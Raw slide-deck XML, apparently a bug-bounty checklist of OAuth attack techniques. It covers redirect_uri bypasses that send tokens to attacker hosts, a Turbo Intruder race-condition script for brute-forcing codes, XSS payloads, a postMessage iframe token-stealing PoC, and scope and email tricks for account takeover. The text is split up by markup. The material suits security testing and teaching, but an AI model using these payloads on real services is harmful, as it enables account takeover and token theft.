              <a:rPr b="1" lang="en" sz="1200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5" name="Google Shape;585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87" name="Google Shape;587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Invisible Range %00 To %FF in The URL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e.g. me.com%5bcompany.com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As Value Of Redirect URL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8" name="Google Shape;5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0" name="Google Shape;59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3" name="Google Shape;593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9" name="Google Shape;599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</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Request Method To e.g. GET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HEAD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PUT</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> To Understand How Company Routes The Different Methods in OAuth Flow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2" name="Google Shape;60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HEAD</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>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type=code&amp;client_id=ID&amp;state=Random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                     &amp;redirect_uri=URL&amp;scope=read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04" name="Google Shape;604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5" name="Google Shape;605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1" name="Google Shape;611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13" name="Google Shape;613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Use Open Redirection In company.com To Bypass The Whitelist e.g. https://ww.comapny.com/login?next=https://me.com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Steal </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Access Token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4" name="Google Shape;61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?type=code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&amp;client_id=ID&amp;state=Random&amp;redirect_uri=</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>https://ww.comapny.com/login?next=https://me.com</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&amp;scope=read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616" name="Google Shape;61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8" name="Google Shape;618;p7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9" name="Google Shape;619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7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1" name="Google Shape;621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7" name="Google Shape;627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9" name="Google Shape;629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After </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Getting</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> The </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Authorization Code If </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>There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Isn't State Parameter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There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Isn't Validation On State Parameter </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Try To Use The Authorization Code With CSRF POC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30" name="Google Shape;63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/oauth/</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Callback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r>
              <a:rPr b="1" lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>code=AUTH_CODE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32" name="Google Shape;632;p7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3" name="Google Shape;63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5" name="Google Shape;63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38" name="Google Shape;638;p7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9" name="Google Shape;639;p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1" name="Google Shape;641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Brute Force</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Code Parameter By Using </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Race Condition</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Technique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IP Rotate Burp Suite Extension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47" name="Google Shape;647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800">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Callback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r>
              <a:rPr b="1" lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>code=FUZZ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48" name="Google Shape;648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9" name="Google Shape;649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1" name="Google Shape;6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Reaction Of The Server While Doing Race Condition By Using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Turbo Intruder</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>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Nuclei</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> To Send Simultaneously Requests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9" name="Google Shape;659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GET</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> /</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>oauth/Callback?</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>code=Valid</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> HTTP/1.1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Host: www.company.com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X-Test: %s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email=victim@gmail.com&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="700">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>otp=wrongOTP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def queueRequests(target, wordlists):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 = RequestEngine(endpoint=target.endpoint,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concurrentConnections=30,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requestsPerConnection=100,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pipeline=False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for i in range(30):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engine.queue(target.req, target.baseInput, gate='race1')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engine.openGate('race1')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engine.complete(timeout=60)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def handleResponse(req, interesting):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table.add(req)</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="700">
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="660" name="Google Shape;660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1" name="Google Shape;661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3" name="Google Shape;663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0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7" name="Google Shape;667;p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9" name="Google Shape;669;p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5" name="Google Shape;675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7" name="Google Shape;677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XSS Payloads</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t> e.g. ,%2520alert(123))%253B// </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>In The Authorization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Code </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Parameter </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>If Value Of Code Parameter </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Reflected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8" name="Google Shape;67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/oauth/</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Callback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	code=</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>,%2520alert(123))%253B//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680" name="Google Shape;68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7" name="Google Shape;687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89" name="Google Shape;689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Authorization Code Is Used More Than Once </a:t>
            </a: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Reuse The Authorization Code </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>With XSS Payloads e.g. Code&lt;script&gt;alert('XSS')&lt;/script&gt;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90" name="Google Shape;69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oauth/</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Callback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client_id=ID&amp;client_secret=SECRET&amp;type=</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Authorization&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>code=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Auth_Code</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;script&gt;alert('XSS')&lt;/script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&amp;redirect_uri=URL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92" name="Google Shape;692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3" name="Google Shape;69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5" name="Google Shape;695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1" name="Google Shape;701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3" name="Google Shape;703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Try To Monitor Your Requests To Figure , </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Is There Any Sensitive </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Information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Leaked </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>In </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Referer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Header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704" name="Google Shape;70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</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: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https://www.</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>company.com</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/Path</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-To-Do-Action</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>?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accessToken=Secret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getMobile=Value&amp;accessToken=Secret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7" name="Google Shape;70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9" name="Google Shape;709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5" name="Google Shape;715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17" name="Google Shape;717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If App Ask You Log In With OAuth Provider By Generating OAuth Token ,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Try To Use The OAuth Token With Logged In User In OAuth Provider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718" name="Google Shape;71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1 - I am logged in with app.com as Account One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2 - I open appservice.com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3 - I get https://api.app.com/oauth/?oauth_token=*****</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1000" u="sng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</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t> I did not move forward and shared this link with someone who is logged in with app.com as Account Two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5 - Account Two grants the permission to the third Party App appservice.com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6 -</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Account One also  grants the permission to the third Party App appservice.com By Using The Same OAuth Token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7 - I Get Dashboard Of appservice.com of Account Two Not Account One</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1000">
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="720" name="Google Shape;72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22" name="Google Shape;722;p7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3" name="Google Shape;72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Remove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Your Email From Scope Parameter </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>While Signing Up OR Signing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In </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>With Services Provider </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>To Get Account Takeover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9" name="Google Shape;729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31" name="Google Shape;731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</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Create Account With OAuth By Using Email e.g. </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>me@gmail.com</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> , Try Change Your Email to e.g. </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Victim@gmail.com</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Then Log In Again With OAuth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2" name="Google Shape;73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1 - Create Account With OAuth By Using Account One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2 - Go To Settings And Change Your Email To Account Two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3</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000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When The Victim Try To Create An Account , It Says The Email Already Exists ,  Now The Victim Will Reset Password And Logged In Using Email-Password Method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4</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> - Is Attacker Also Able To Logged In Using OAuth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34" name="Google Shape;734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5" name="Google Shape;735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1" name="Google Shape;741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3" name="Google Shape;743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If</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> app.com Use The Access Token To log In , </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>There Is An Issue Here </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Because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You Can Get The Access Token</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> From Any Third Party App And Log in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744" name="Google Shape;74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Company used `Login with Facebook` account.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Used `access_tokens` to login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https://app.com/login?</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>access_tokens=*******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6" name="Google Shape;746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7" name="Google Shape;74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55" name="Google Shape;755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Try To Use</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Whitelist Subdomain With Endpoint </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Contains </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>postMessage(Msg,"*");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In which</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Msg = window.location.href.split("#")[1]; </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>To Steal The Access Token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6" name="Google Shape;75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1 - search About :-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	</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>var Msg = window.location.href.split("#")[1];</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="10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window.parent.postMessage(Msg,"*");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2 - </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>There Isn't :-</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1000"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X-Frame-Options Header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3</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> - Use This POC :-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var exploit_url = 'https://company.com/oauth?client_id=id&amp;redirect_uri=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https://sub.company.com/postMsg.js';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var i = document.createElement('iframe');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document.body.appendChild(i);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window.addEventListener('oauth', function(Token) {alert(Token.data.name);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}, !1);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758" name="Google Shape;758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9" name="Google Shape;759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8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1" name="Google Shape;761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400" y="-33950"/>
            <a:ext cx="9276775" cy="52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2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="58375" y="4711825"/>
            <a:ext cx="9016200" cy="462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68" name="Google Shape;768;p82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769" name="Google Shape;769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3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3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6" name="Google Shape;776;p83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77" name="Google Shape;77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3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3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3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Sign Up OR Log In With </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Facebook</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> , Try To </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Use Access Token</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Of Your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App </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Instead Of Auth Token</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Of Victim App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 Create Facebook App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 Generate Access Token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Go To Victim App And Click On The Facebook Sign In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 Button With Intercepting Traffic Using Burp Suite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Change Value Of auth_token Parameter To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The Access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 Forward The Request And You Will Be Login Since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 There Is No Validation Weather The Access Token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 Generated For Victim App OR Other App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Change The Host Header e.g. me.com/www.company.com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me.com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While Trying To Test OAuth Flow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 me.com/www.company.com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Insert Your Domain e.g. https://me.com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https://me.com/company.com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https://localhost </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>In Referer Header While Trying To Test OAuth Flow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Referer: https://me.com/path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8" name="Google Shape;298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Your App To Steal Access Token By Creating App</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> e.g. Create App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On FB Then If There Log In With FB , Try To </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Rebuild Your Request</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Like This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type=</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>token</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&amp;client_id=</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Attacker-ID</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&amp;state=Random&amp;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redirect_uri=</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>https://www.attacker.com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    scope=read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01438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 OAuth Connect Request , Try To </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Insert admin@company.com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as Value Of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Email In Scope Parameter</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> To Gain Extra Authorities OR Get More Functionalities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/oauth/</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Connect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firstname=I&amp;lastname=am&amp;image=URL&amp;anti_csrf=CSRF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&amp;email=</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>admin@company.com</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&amp;access_token=******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